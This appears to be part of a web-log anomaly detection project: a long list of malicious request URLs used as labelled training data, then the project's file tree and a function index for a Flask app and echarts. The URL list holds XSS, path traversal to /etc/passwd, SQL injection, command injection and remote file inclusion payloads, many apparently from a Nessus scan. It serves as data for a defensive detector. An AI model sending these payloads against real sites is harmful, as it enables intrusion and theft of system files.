/en-us/hipkz026.do?<script>document.cookie="testyrbs=2855;"</script>
/demo/ms-pe02/catalog.php?cid=0&sid='"&sortfield=title&sortorder=asc&pagenumber=1&main=http://192.168.202.118:8080/iroy1gvqrrqu?&
/spg-xss/
/scripteditor/
/p043snfr.cfm?<script>cross_site_scripting.nasl</script>
/en-us/account/wordtrans.php?command=show_desc&advanced=1";id; true "
/cmsimple2_7/cmsimple/cms.php?pth['file']['config']=http://192.168.202.96:8080/no4ghqiguzhst??
/cgi-local/ion-p?page=../../../../../etc/passwd
/edzaia0i.kspx?<script>cross_site_scripting.nasl</script>
/examples/jsp/jsp2/jspx/smpwservicescgi.exe
/subscriptions.vbs
/q703m78q.jspa?<meta http-equiv=set-cookie content="testvowq=604">
/vhzmaia2.kspx?<script>document.cookie="testkogj=3979;"</script>
/script/cat_for_gen.php?ad=1&ad_direct=../&m_for_racine=</option></select><?phpinfo();?>
/en-us/w4996nr0.cgi?<meta http-equiv=set-cookie content="testttvs=7163">
/cgi-bin/sojourn.cgi?cat=../../../../../etc/passwd\x00
/javascript/panel.exe
/cgi-914/ustorekeeper.pl?command=goto&file=../../../../../../../../../../etc/passwd
/ywaxntrx.asp?<img src="javascript:alert(cross_site_scripting.nasl);">
/examples/servlets/servlet/admin/general.php?mode=perlinfo&config[general][perl_binary]=cat /etc/passwd||
/javascript/document.tpl
/cgi.cgi/dcforum.cgi?az=list&forum=../../../../../../../../../../etc/passwd\x00
/examples/jsp/jsp2/jspx/inc/functions.inc.php?config[ppa_root_path]=/etc/passwd\x00
/phpmyadmin/documentation.html?phpmyadmin=1"
/javascript/42.exe
/wasdscripts172-vax/
/y8pmygrp.php?<img src="javascript:alert(cross_site_scripting.nasl);">
/examples/jsp/colors/wiki.php/<script>foo</script>
/scripts/gdxlwjnlsr6i.cfm
/cgi-bin/nucleus/libs/pluginadmin.php?globals[dir_libs]=/etc/passwd\x00
/help.php?q="&ver&rem,
/scripts/settings/site.ini
/7o5qp766.php3?<script>cross_site_scripting.nasl</script>
/moodle/filter/tex/texed.php?formdata=foo&pathname=foo";ls+-l;rm+/tmp/fbpansgiuv"
/ows-bin/fileseek2.cgi?foot=&head=....//....//....//....//....//....//....//etc/passwd
/sponsor-shot'02/
/help.php?q="ping\x0c-w\x0c10000\x0c-n\x0c1\x0c1.2.3.4&rem\x0c
/hrttz9fj.kspx?<meta http-equiv=set-cookie content="testtbjy=7334">
/javascript/dclk.exe
/fo564rei.nsf?<script>cross_site_scripting.nasl</script>
/3hlysl2x.mscgi?<script>document.cookie="testgjbe=8505;"</script>
/en-us/hipkz026.cgi?<script>document.cookie="testyrbs=2855;"</script>
/antispam/listdel?file=whitelist&name=a<script>alert('vulnerable')</script>&startline=0(naturally)
/cgi-perl/htimage.exe/path/filename?2,2
/y8pmygrp.htm?<img src="javascript:alert(cross_site_scripting.nasl);">
/phpmyadmin/phprint.php?module=vtiger_lang_crm_lfi.nasl&action=1331904366&lang_crm=../../../../../../../../../../../..//etc/passwd\x00
/examples/servlets/servlet/sql.php3?lib_inc=1&btndrop=no&goto=/etc/passwd
/usr/extensions/get_infochannel.inc.php?root_path=http://192.168.202.96:8080/4dckqcc0acprbz??cmd=id;pwd
/examples/jsp/sessions/cgiforum.pl?thesection=../../../../../../../../etc/passwd\x00
/manager/embed/day.php?path=/etc/passwd\x00
/help.php?q="del;q43131815&rem;
/main.php?stuff='\x0arm\x09q13973431\x09#
/terrmcd'/
/eg2u8pbv.cfm?<script>cross_site_scripting.nasl</script>
/include/scripts/send_email_cache.php?dir=http://192.168.202.118:8080/2aibfaczmac8?
/scripts/t99iadgtkf9h.asp
/layoutscripts/
/hipkz026.php?<meta http-equiv=set-cookie content="testyrbs=2855">
/recordings/listrec.pl?app=qmh-news&template=;ls /etc|
/scripts/ncbook.cgi?action=default¤t=|cat /etc/passwd|&form_tid=996604045&prev=main.html&list_message_index=10
/cgi/gw5/gwweb.exe?htmlver=aaa&get-context
/examples/jsp/checkbox/lib/adodb_lite/adodb-perf-module.inc.php?last_module=zzz_adoconnection{}system(id);class zzz_adoconnection{}//
/examples/jsp/colors/core/adodb/server.php?sql='adodb_sql_sql_injection.nasl
/phpmyadmin/../phpmyadmin.sln
/ewc3rz1l.asp?<script>document.cookie="testkgqo=204;"</script>
/examples/jsp/cal/include/error/autherror.cfm?errorcode=1&ftvar_linkp="></a><script>alert('fusetalk_mult_xss.nasl')</script><a href="
/forum1.asp?n=1753&nn=c:\boot.ini
/fcgi-bin/cgi-test.exe
/main.php?logout=ping;-w;9000;-n;1;4.3.2.1|rem;
/mpcgi/texis.exe/junk
/help.php?q="&ping;-w;8000;-n;1;4.3.2.1&rem;
//../../../../../../../../windows/win.ini\x00en
/s7qus4g3.html?<img src="javascript:alert(cross_site_scripting.nasl);">
/cgi-win/fileseek2.cgi?foot=....//....//....//....//....//....//....//etc/passwd&head=
/scripts/fileseek.cgi?foot=&head=;cat /etc/passwd|
/examples/jsp/checkbox/apa_phpinclude.inc.php?apa_module_basedir=/etc/passwd\x00
/scripts/qg9h0c0svvat.pl
/uc3w3bdi.exe?<meta http-equiv=set-cookie content="testxllt=9940">
/imp/mailbox.php3?actionid=6&server=x&imapuser=x';somesql&pass=x
/8t9v8k7x.htm?<script>document.cookie="testhvje=9403;"</script>
/p043snfr.do?<script>cross_site_scripting.nasl</script>
/index.php?op=default&date=200607' union select 1,779875714,1,1,1,1,1,1,1,1--&blogid=1
/en-us/account/docs.php?doc=../jpgraph-1.12.1/docs/index
/examples/jsp/colors/index.php?string='
/scripts/lom_update.php?etcdir=http://192.168.202.118:8080/tzhfyzkbomspvm?
/t3af3tdz.nsf?<img src="javascript:alert(cross_site_scripting.nasl);">
/help.php?q="del\x09q57557316&rem\x09
/cgi-local/testcgi.exe
/manager/html;jsessionid=8c46789d19abadf0888a3b406a3d1441?org.apache.catalina.filters.csrf_nonce=ba2f57ae4d6ec3af51ddecd681e24205
/9ko6m4c8.fts?<script>document.cookie="testylik=3403;"</script>
/javascript/decode.exe
/odzk29aa.nsf?<meta http-equiv=set-cookie content="testtfvh=2141">
/t578vqea.x?<script>document.cookie="testsory=7676;"</script>
/dirdiff_script/
/en-us/n9xlumt5.exe?<img src="javascript:alert(cross_site_scripting.nasl);">
/scripts/www/delivery/ac.php?bannerid=-1331908693+or+1=1+--+';passthru(base64_decode($_server[http_nessus_f6pybogs]));die;/*
/javascript/options.exe
/x2gyorli.exe?<script>document.cookie="testwhac=3130;"</script>
/azcrfs8d.asp?<script>document.cookie="testjpdr=9205;"</script>
/webcalendar/week.php?user=\"><script>alert(document.cookie)</script>
/en-us/<img src="javascript:alert(cross_site_scripting.nasl);">.jsp
/javascript/tip.exe
/6wb70v0b.php?<img src="javascript:alert(cross_site_scripting.nasl);">
/top.php?stuff=';uname >q26271527 #
/examples/jsp/colors/check_user_id.php?user_id=<script>foo</script>
/examples/jsp/jsp2/el/yabb.pl?board=news&action=display&num=../../../../../../etc/passwd\x00
/scripts/webif.cgi
/o6ebbirj.do?<script>cross_site_scripting.nasl</script>
/cleartrust/ct_logon.jsp?ctloginerrormsg=<script>alert(1)</script>
/somepagewithxss/
/top.php?stuff="&del q94671165 #
/help.php?q="ping\x0c-w\x0c8000\x0c-n\x0c1\x0c1.2.3.4|rem\x0c
/ydexw8by.exe?<meta http-equiv=set-cookie content="testulex=4996">
/en-us/n9xlumt5.aspx?<img src="javascript:alert(cross_site_scripting.nasl);">
/jw64yq8u.fts?<meta http-equiv=set-cookie content="testylfu=1313">
/recordings/login.php?lang=/../../../../../../../../../../../../etc/passwd\x00
/scripts/perl?-v
/top.php?stuff="&ping;-w;8000;-n;1;4.3.2.1&rem;
/phpmyadmin/index.php?configfile=../../../../../../../../../etc/passwd
/error/\..\..\..\..\windows\win.ini
/examples/jsp/checkbox/index.php?entry='
/javascript/sink.exe
/vhzmaia2.php3?<meta http-equiv=set-cookie content="testkogj=3979">
/scripts/xtextarea.scr.php?globals[pth][spaw]=http://192.168.202.118:8080/tzhfyzkbomspvm??
/examples/jsp/colors/contenido/classes/class.inuse.php?cfg[path][contenido]=/etc/passwd\x00
/javascript/show_thread.exe
/shopscript/
/tuwjta1w.dll?<script>document.cookie="testpokn=7494;"</script>
/esmozg5d.do?<script>cross_site_scripting.nasl</script>
/phpmyadmin/documentation.html?phpmyadmin=../../../../../../../../../../etc/passwd
/rv98iwjp.php?<img src="javascript:alert(cross_site_scripting.nasl);">
/scripts/u7m5ok8eqpfy.php3
/en-us/i686v90l.jsp?<script>document.cookie="testfutf=1550;"</script>
/phpmyadmin/db_details_importdocsql.php?submit_show=true&do=import&docpath=../
/ows-bin/webcart/webcart.cgi?change=yes&code=phold&config=mountain&nextpage=;cat /etc/passwd|
/um7xpn15.mscgi?<meta http-equiv=set-cookie content="testotoy=6142">
/226_asp tutorials - microsoft scripting runtime dll/
/vac1l5vm.aspx?<script>cross_site_scripting.nasl</script>
/byrg33fw.x?<meta http-equiv=set-cookie content="testexuu=5340">
/filedetails.php?path=</title><script>alert(414086083540)</script>
/script//ident/index.php?path_inc=http://192.168.202.96:8080/4dckqcc0acprbz?
/lmw4r201.exe?<meta http-equiv=set-cookie content="testwews=8477">
/cgis/sensepost.exe?/c+dir
/en-us/account/user.cgi?url="><script>alert("gossamer_links_url_xss.nasl");</script>&from=add
/scs86g1p.asp?<script>document.cookie="testquyx=2820;"</script>
/javascript/ccbill.exe
/javascript/_pages.exe
/dir_thatware/config.php?root_path=http://192.168.202.118:8080/iroy1gvqrrqu?'
/examples/jsp/error/cart32.exe
/examples/jsp/num/library/adodb/server.php?sql='adodb_sql_sql_injection.nasl
/help.php?q="del\xa0q23773279&rem\xa0
/e9rx3ya4.nsf?<img src="javascript:alert(cross_site_scripting.nasl);">
/nyjgaorz.dll?<script>cross_site_scripting.nasl</script>
/<meta http-equiv=set-cookie content="testvlau=8517">
/cgi-915/fileseek.cgi?foot=&head=;cat /etc/passwd|
/phpmyadmin/documentation.html?phpmyadmin=`/etc/passwd`
/main.php?frm_daynight=day&frm_passwd=&frm_referer=http%3a//192.168.24.202/main.php%3fstuff%3d1583574484&frm_user=q54818976&scr_height=&scr_width=
/examples/jsp/checkbox/gotopage.cgi?4242+../../../../../../../../../../../../../etc/passwd
/awstats/awstats.pl?migrate=|echo;/bin/echo -en "h\0300\0250\0312fh\0002\0000\0340\0275\0211\0340j\0020pr" >> /tmp/xmefwyizyj0;echo|awstats230267.txt
/cgi-bin/readfile.tcl?file=/etc/master.passwd
/javascript/decoder.exe
/m5103snj.x?<script>cross_site_scripting.nasl</script>
/examples/servlets/servlet/manager/media/browser/mcpuk/connectors/php/commands/thumbnail.php?base_path=/etc/passwd\x00
/main.php?logout="&ver >q75783223&rem
/t578vqea.cgi?<script>document.cookie="testsory=7676;"</script>
/scriptpage/source/includes/load_forum.php?mfh_root_path=http://192.168.202.118:8080/tzhfyzkbomspvm?
/javascript/todo.exe
/zuihld5m.fts?<script>cross_site_scripting.nasl</script>
/l4fz1dqw.exe?<script>cross_site_scripting.nasl</script>
/phpmyadmin/webdist.cgi?distloc=;id
/examples/jsp/sessions/includes/db_adodb.php?basedir=/etc/passwd\x00
/<script>document.cookie="testsqmm=5713;"</script>
/169okeyj.php3?<meta http-equiv=set-cookie content="testxeoi=3573">
/scripts/ikonboard.cgi
/scripts/al_initialize.php?alpath=/etc/passwd\x00
/<script>alert('vulnerable');</script>
/bn857frh.do?<img src="javascript:alert(cross_site_scripting.nasl);">
/hipkz026.idc?<script>document.cookie="testyrbs=2855;"</script>
/help.php?q='\x0drm\x09q85664498\x09#
/bmeun223.htm?<script>document.cookie="testhhwu=7044;"</script>
/u95h6ymu.nsf?<script>document.cookie="testkhwc=4028;"</script>
/cgi-bin/session/login.php?dest=nessus"><script>alert('ossim_dest_xss.nasl')</script><!--
/n9xlumt5.fts?<script>cross_site_scripting.nasl</script>
/examples/jsp/num/core/adodb/server.php?sql='adodb_sql_sql_injection.nasl
/help.php?q="&ping\x0b-w\x0b7000\x0b-n\x0b1\x0b4.3.2.1&rem\x0b
/crystalreportwebformviewer/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini
/cgi-home/texis.exe/junk
/dinosaur'us/
/examples/jsp/cal/index.php?_language=../../../../../../../../../../etc/passwd\x00
/phpmyadmin/rot13sj.cgi?/etc/passwd
/odzk29aa.mscgi?<meta http-equiv=set-cookie content="testtfvh=2141">
/9o6g5vkn.asp?<img src="javascript:alert(cross_site_scripting.nasl);">
/main.php?stuff="ping;-w;9000;-n;1;1.2.3.4|rem;
/iajtej82.nsf?<script>cross_site_scripting.nasl</script>
/main.php?stuff="&ping\x0b-w\x0b7000\x0b-n\x0b1\x0b1.2.3.4&rem\x0b
/ydexw8by.cfc?<meta http-equiv=set-cookie content="testulex=4996">
/manager/index.php?p='nessus
/index.php?msgs=<script>alert(414436083577)</script>
/fc9t54l7.do?<script>document.cookie="testggad=2000;"</script>
/help.php?q=ver >q45459255&rem
/examples/jsp/colors/commsrss.php?files[0]=../../../../../../../../../../../../etc/passwd
/comersus_searchitem.asp"><script>alert('nessus was here');</script>
/help.php?q=";del q43236884 #
/cgi-bin/index.php?op=default&date=200607' union select 1,744292830,1,1,1,1,1,1,1,1--&blogid=1
/xfkun1ku.jspa?<script>cross_site_scripting.nasl</script>
ftp://192.168.21.103/*<apache_mod_proxy_ftp_glob_xss.nasl>
/j4oqyvga.html?<script>cross_site_scripting.nasl</script>
/scripts/weigh_keywords.php?etcdir=http://192.168.202.118:8080/moclyxlwqyfjnp?
/j2kdmfw4.cfc?<img src="javascript:alert(cross_site_scripting.nasl);">
/examples/jsp/sessions/help/index.php?help_file=../../../../../../../../../../../etc/passwd
/rpxyx07v.x?<script>document.cookie="testbnli=1975;"</script>
/xsqln7eb.cfc?<meta http-equiv=set-cookie content="testpcbb=9254">
/cgi-bin/index.php?configfile=
gitextract_jksm79cg/
├── .gitignore
├── README.md
├── datasets/
│ ├── access_log
│ └── learning-datasets/
│ ├── testing/
│ │ ├── bad.txt
│ │ └── good.txt
│ └── training/
│ ├── bad.txt
│ └── good.txt
├── flask/
│ ├── app.py
│ ├── requirements.txt
│ ├── static/
│ │ ├── css/
│ │ │ └── styles.css
│ │ └── js/
│ │ └── echarts/
│ │ ├── echarts.js
│ │ ├── extension/
│ │ │ ├── bmap.js
│ │ │ └── dataTool.js
│ │ └── map/
│ │ └── js/
│ │ ├── china.js
│ │ └── world.js
│ └── templates/
│ ├── about.html
│ ├── analysis.html
│ ├── id.html
│ └── index.html
├── flume/
│ └── standalone.conf
├── log_gen/
│ └── log_gen.java
└── spark/
├── build.sbt
├── project/
│ ├── assembly.sbt
│ ├── build.properties
│ ├── project/
│ │ └── target/
│ │ └── config-classes/
│ │ └── $43a0538f7780cac449ae.cache
│ └── target/
│ ├── config-classes/
│ │ ├── $16828faecf688d54d497.cache
│ │ ├── $30003e6e888c6501d0a9.cache
│ │ ├── $3d85af9b26c1a259b49e.cache
│ │ ├── $46bc225346f5c722f39f.cache
│ │ ├── $da50ce791668c9ed0f15.cache
│ │ └── $f2cabef45cb06cd331f1.cache
│ ├── scala-2.12/
│ │ └── sbt-1.0/
│ │ └── update/
│ │ └── update_cache_2.12/
│ │ ├── inputs
│ │ └── output
│ └── streams/
│ ├── _global/
│ │ ├── _global/
│ │ │ ├── _global/
│ │ │ │ └── streams/
│ │ │ │ └── out
│ │ │ └── csrLogger/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── out
│ │ ├── csrConfiguration/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── out
│ │ ├── csrProject/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── out
│ │ ├── dependencyPositions/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── update_cache_2.12/
│ │ │ ├── input_dsp
│ │ │ └── output_dsp
│ │ ├── ivyConfiguration/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── out
│ │ ├── ivySbt/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── out
│ │ ├── moduleSettings/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── out
│ │ ├── projectDescriptors/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── out
│ │ ├── scalaCompilerBridgeScope/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── out
│ │ └── update/
│ │ └── _global/
│ │ └── streams/
│ │ └── out
│ ├── compile/
│ │ ├── _global/
│ │ │ └── _global/
│ │ │ ├── compileBinaryFileInputs/
│ │ │ │ └── previous
│ │ │ ├── compileOutputs/
│ │ │ │ └── previous
│ │ │ ├── compileSourceFileInputs/
│ │ │ │ └── previous
│ │ │ ├── dependencyClasspathFiles/
│ │ │ │ └── previous
│ │ │ ├── discoveredMainClasses/
│ │ │ │ └── data
│ │ │ └── managedSourcePaths/
│ │ │ └── previous
│ │ ├── compile/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── out
│ │ ├── compileIncremental/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ ├── export
│ │ │ └── out
│ │ ├── copyResources/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ ├── copy-resources
│ │ │ └── out
│ │ ├── dependencyClasspath/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── export
│ │ ├── exportedProducts/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── export
│ │ ├── externalDependencyClasspath/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── export
│ │ ├── internalDependencyClasspath/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── export
│ │ ├── managedClasspath/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── export
│ │ ├── unmanagedClasspath/
│ │ │ └── _global/
│ │ │ └── streams/
│ │ │ └── export
│ │ └── unmanagedJars/
│ │ └── _global/
│ │ └── streams/
│ │ └── export
│ └── runtime/
│ ├── dependencyClasspath/
│ │ └── _global/
│ │ └── streams/
│ │ └── export
│ ├── exportedProducts/
│ │ └── _global/
│ │ └── streams/
│ │ └── export
│ ├── externalDependencyClasspath/
│ │ └── _global/
│ │ └── streams/
│ │ └── export
│ ├── fullClasspath/
│ │ └── _global/
│ │ └── streams/
│ │ └── export
│ ├── internalDependencyClasspath/
│ │ └── _global/
│ │ └── streams/
│ │ └── export
│ ├── managedClasspath/
│ │ └── _global/
│ │ └── streams/
│ │ └── export
│ ├── unmanagedClasspath/
│ │ └── _global/
│ │ └── streams/
│ │ └── export
│ └── unmanagedJars/
│ └── _global/
│ └── streams/
│ └── export
├── src/
│ └── main/
│ └── scala/
│ ├── learning.scala
│ └── streaming.scala
└── target/
└── streams/
└── _global/
└── _global/
└── checkBuildSources/
└── _global/
├── inputFileStamps/
│ └── previous
└── streams/
└── out
SYMBOL INDEX (1409 symbols across 5 files)
FILE: flask/app.py
function sys_time (line 31) | def sys_time():
function welcome (line 46) | def welcome():
function log_stream (line 52) | def log_stream():
function analysis (line 70) | def analysis():
function count_board (line 76) | def count_board():
function hot_geo (line 126) | def hot_geo():
function hot_url (line 158) | def hot_url():
function hot_ip (line 180) | def hot_ip():
function status_code_pie (line 213) | def status_code_pie():
function req_method_pie (line 236) | def req_method_pie():
function req_count_timeline (line 259) | def req_count_timeline():
function timestamp_count_timeline (line 283) | def timestamp_count_timeline():
function id (line 304) | def id():
function bad_count (line 310) | def bad_count():
function bad_count (line 326) | def bad_count():
function good_geo (line 342) | def good_geo():
function bad_geo (line 381) | def bad_geo():
function url_cate_count_timeline (line 420) | def url_cate_count_timeline():
function bad_detail (line 467) | def bad_detail():
function good_detail (line 504) | def good_detail():
function about (line 540) | def about():
FILE: flask/static/js/echarts/echarts.js
function detect (line 120) | function detect(ua) {
function $override (line 284) | function $override(name, fn) {
function clone (line 309) | function clone(source) {
function merge (line 357) | function merge(target, source, overwrite) {
function mergeAll (line 399) | function mergeAll(targetAndSources, overwrite) {
function extend (line 412) | function extend(target, source) {
function defaults (line 427) | function defaults(target, source, overlay) {
function getContext (line 449) | function getContext() {
function indexOf (line 462) | function indexOf(array, value) {
function inherits (line 483) | function inherits(clazz, baseClazz) {
function mixin (line 504) | function mixin(target, source, overlay) {
function isArrayLike (line 515) | function isArrayLike(data) {
function each$1 (line 532) | function each$1(obj, cb, context) {
function map (line 561) | function map(obj, cb, context) {
function reduce (line 585) | function reduce(obj, cb, memo, context) {
function filter (line 608) | function filter(obj, cb, context) {
function find (line 634) | function find(obj, cb, context) {
function bind (line 651) | function bind(func, context) {
function curry (line 663) | function curry(func) {
function isArray (line 675) | function isArray(value) {
function isFunction$1 (line 684) | function isFunction$1(value) {
function isString (line 693) | function isString(value) {
function isObject$1 (line 702) | function isObject$1(value) {
function isBuiltInObject (line 714) | function isBuiltInObject(value) {
function isTypedArray (line 723) | function isTypedArray(value) {
function isDom (line 732) | function isDom(value) {
function eqNaN (line 743) | function eqNaN(value) {
function retrieve (line 754) | function retrieve(values) {
function retrieve2 (line 762) | function retrieve2(value0, value1) {
function retrieve3 (line 768) | function retrieve3(value0, value1, value2) {
function slice (line 783) | function slice() {
function normalizeCssArray (line 796) | function normalizeCssArray(val) {
function assert$1 (line 817) | function assert$1(condition, message) {
function trim (line 828) | function trim(str) {
function setAsPrimitive (line 844) | function setAsPrimitive(obj) {
function isPrimitive (line 848) | function isPrimitive(obj) {
function HashMap (line 856) | function HashMap(obj) {
function createHashMap (line 901) | function createHashMap(obj) {
function concatArray (line 905) | function concatArray(a, b) {
function noop (line 918) | function noop() {}
function create (line 975) | function create(x, y) {
function copy (line 994) | function copy(out, v) {
function clone$1 (line 1005) | function clone$1(v) {
function set (line 1019) | function set(out, a, b) {
function add (line 1031) | function add(out, v1, v2) {
function scaleAndAdd (line 1044) | function scaleAndAdd(out, v1, v2, a) {
function sub (line 1056) | function sub(out, v1, v2) {
function len (line 1067) | function len(v) {
function lenSquare (line 1077) | function lenSquare(v) {
function mul (line 1088) | function mul(out, v1, v2) {
function div (line 1100) | function div(out, v1, v2) {
function dot (line 1112) | function dot(v1, v2) {
function scale (line 1122) | function scale(out, v, s) {
function normalize (line 1133) | function normalize(out, v) {
function distance (line 1152) | function distance(v1, v2) {
function distanceSquare (line 1166) | function distanceSquare(v1, v2) {
function negate (line 1177) | function negate(out, v) {
function lerp (line 1190) | function lerp(out, v1, v2, t) {
function applyTransform (line 1202) | function applyTransform(out, v, m) {
function min (line 1216) | function min(out, v1, v2) {
function max (line 1228) | function max(out, v1, v2) {
function Draggable (line 1265) | function Draggable() {
function param (line 1351) | function param(target, e) {
function normalizeQuery (line 1591) | function normalizeQuery(host, query) {
function on (line 1599) | function on(eventful, event, query, handler, context, isOnce) {
function determinant (line 1653) | function determinant(rows, rank, rowStart, rowMask, colMask, detCache) {
function buildTransformer (line 1706) | function buildTransformer(src, dest) {
function transformLocalCoord (line 1781) | function transformLocalCoord(out, elFrom, elTarget, inX, inY) {
function transformCoordWithViewport (line 1808) | function transformCoordWithViewport(out, el, inX, inY, inverse) {
function prepareCoordMarkers (line 1821) | function prepareCoordMarkers(el, saved) {
function preparePointerTransformer (line 1860) | function preparePointerTransformer(markers, saved, inverse) {
function isCanvasEl (line 1888) | function isCanvasEl(el) {
function clientToLocal (line 1924) | function clientToLocal(el, e, out, calculate) {
function calculateZrXY (line 1961) | function calculateZrXY(el, e, out) {
function getNativeEvent (line 1997) | function getNativeEvent(e) {
function normalizeEvent (line 2020) | function normalizeEvent(el, e, calculate) {
function addEventListener (line 2066) | function addEventListener(el, name, handler, opt) {
function removeEventListener (line 2104) | function removeEventListener(el, name, handler, opt) {
function isMiddleOrRightButtonOnMouseUpDown (line 2138) | function isMiddleOrRightButtonOnMouseUpDown(e) {
function dist$1 (line 2210) | function dist$1(pointPair) {
function center (line 2217) | function center(pointPair) {
function makeEventPacket (line 2322) | function makeEventPacket(eveType, targetInfo, event) {
function stopEvent (line 2344) | function stopEvent() {
function EmptyProxy (line 2348) | function EmptyProxy() {}
function isHover (line 2674) | function isHover(displayable, x, y) {
function isOutsideBoundary (line 2699) | function isOutsideBoundary(handlerInstance, x, y) {
function create$1 (line 2722) | function create$1() {
function identity (line 2733) | function identity(out) {
function copy$1 (line 2748) | function copy$1(out, m) {
function mul$1 (line 2764) | function mul$1(out, m1, m2) {
function translate (line 2789) | function translate(out, a, v) {
function rotate (line 2805) | function rotate(out, a, rad) {
function scale$1 (line 2830) | function scale$1(out, a, v) {
function invert (line 2847) | function invert(out, a) {
function clone$2 (line 2875) | function clone$2(a) {
function isNotAroundZero (line 2903) | function isNotAroundZero(val) {
function Clip (line 3545) | function Clip(options) {
function clampCssByte (line 3919) | function clampCssByte(i) { // Clamp to integer 0 .. 255.
function clampCssAngle (line 3924) | function clampCssAngle(i) { // Clamp to integer 0 .. 360.
function clampCssFloat (line 3929) | function clampCssFloat(f) { // Clamp to float 0.0 .. 1.0.
function parseCssInt (line 3933) | function parseCssInt(str) { // int or percentage.
function parseCssFloat (line 3940) | function parseCssFloat(str) { // float or percentage.
function cssHueToRgb (line 3947) | function cssHueToRgb(m1, m2, h) {
function lerpNumber (line 3967) | function lerpNumber(a, b, p) {
function setRgba (line 3971) | function setRgba(out, r, g, b, a) {
function copyRgba (line 3978) | function copyRgba(out, a) {
function putToCache (line 3989) | function putToCache(colorStr, rgbaArr) {
function parse (line 4003) | function parse(colorStr, rgbaArr) {
function hsla2rgba (line 4119) | function hsla2rgba(hsla, rgba) {
function rgba2hsla (line 4147) | function rgba2hsla(rgba) {
function lift (line 4215) | function lift(color, level) {
function toHex (line 4241) | function toHex(color) {
function fastLerp (line 4255) | function fastLerp(normalizedValue, colors, out) {
function lerp$1 (line 4291) | function lerp$1(normalizedValue, colors, fullOutput) {
function modifyHSL (line 4338) | function modifyHSL(color, h, s, l) {
function modifyAlpha (line 4357) | function modifyAlpha(color, alpha) {
function stringify (line 4371) | function stringify(arrColor, type) {
function defaultGetter (line 4402) | function defaultGetter(target, key) {
function defaultSetter (line 4406) | function defaultSetter(target, key, value) {
function interpolateNumber (line 4416) | function interpolateNumber(p0, p1, percent) {
function interpolateString (line 4426) | function interpolateString(p0, p1, percent) {
function interpolateArray (line 4437) | function interpolateArray(p0, p1, percent, out, arrDim) {
function fillArr (line 4458) | function fillArr(arr0, arr1, arrDim) {
function isArraySame (line 4501) | function isArraySame(arr0, arr1, arrDim) {
function catmullRomInterpolateArray (line 4541) | function catmullRomInterpolateArray(
function catmullRomInterpolate (line 4576) | function catmullRomInterpolate(p0, p1, p2, p3, t, t2, t3) {
function cloneValue (line 4584) | function cloneValue(value) {
function rgba2String (line 4601) | function rgba2String(rgba) {
function getArrayDim (line 4609) | function getArrayDim(keyframes) {
function createTrackClip (line 4614) | function createTrackClip(animator, easing, oneTrackDone, keyframes, prop...
function animateTo (line 5218) | function animateTo(animatable, target, time, delay, easing, callback, fo...
function animateToShallow (line 5300) | function animateToShallow(animatable, path, source, target, time, delay,...
function setAttrByPath (line 5343) | function setAttrByPath(el, path, name, value) {
function BoundingRect (line 5624) | function BoundingRect(x, y, width, height) {
function minRunLength (line 6121) | function minRunLength(n) {
function makeAscendingRun (line 6132) | function makeAscendingRun(array, lo, hi, compare) {
function reverseRun (line 6155) | function reverseRun(array, lo, hi) {
function binaryInsertionSort (line 6165) | function binaryInsertionSort(array, lo, hi, start, compare) {
function gallopLeft (line 6211) | function gallopLeft(value, array, start, length, hint, compare) {
function gallopRight (line 6268) | function gallopRight(value, array, start, length, hint, compare) {
function TimSort (line 6329) | function TimSort(array, compare) {
function sort (line 6733) | function sort(array, compare, lo, hi) {
function shapeCompareFunc (line 6783) | function shapeCompareFunc(a, b) {
function createLinearGradient (line 7052) | function createLinearGradient(ctx, obj, rect) {
function createRadialGradient (line 7076) | function createRadialGradient(ctx, obj, rect) {
function returnFalse (line 7554) | function returnFalse() {
function createDom (line 7566) | function createDom(id, painter, dpr) {
function findExistImage (line 7803) | function findExistImage(newImageOrSrc) {
function createOrUpdateImage (line 7824) | function createOrUpdateImage(newImageOrSrc, image, hostEl, cb, cbPayload) {
function imageOnLoad (line 7868) | function imageOnLoad() {
function isImageReady (line 7881) | function isImageReady(image) {
function $override$1 (line 7896) | function $override$1(name, fn) {
function getWidth (line 7906) | function getWidth(text, font) {
function getBoundingRect (line 7942) | function getBoundingRect(text, font, textAlign, textVerticalAlign, textP...
function getPlainTextRect (line 7948) | function getPlainTextRect(text, font, textAlign, textVerticalAlign, text...
function getRichTextRect (line 7965) | function getRichTextRect(text, font, textAlign, textVerticalAlign, textP...
function adjustTextX (line 7990) | function adjustTextX(x, width, textAlign) {
function adjustTextY (line 8008) | function adjustTextY(y, height, textVerticalAlign) {
function calculateTextPosition (line 8026) | function calculateTextPosition(out, style, rect) {
function truncateText (line 8150) | function truncateText(text, containerWidth, font, ellipsis, options) {
function prepareTruncateOptions (line 8167) | function prepareTruncateOptions(containerWidth, font, ellipsis, options) {
function truncateSingleLine (line 8205) | function truncateSingleLine(textLine, options) {
function estimateLength (line 8243) | function estimateLength(text, contentWidth, ascCharWidth, cnCharWidth) {
function getLineHeight (line 8258) | function getLineHeight(font) {
function measureText (line 8269) | function measureText(text, font) {
function parsePlainText (line 8291) | function parsePlainText(text, font, padding, textLineHeight, truncate) {
function parseRichText (line 8367) | function parseRichText(text, style) {
function pushTokens (line 8529) | function pushTokens(block, str, styleName) {
function makeFont (line 8568) | function makeFont(style) {
function buildPath (line 8590) | function buildPath(ctx, shape) {
function normalizeTextStyle (line 8690) | function normalizeTextStyle(style) {
function normalizeStyle (line 8696) | function normalizeStyle(style) {
function renderText (line 8729) | function renderText(hostEl, ctx, text, style, rect, prevEl) {
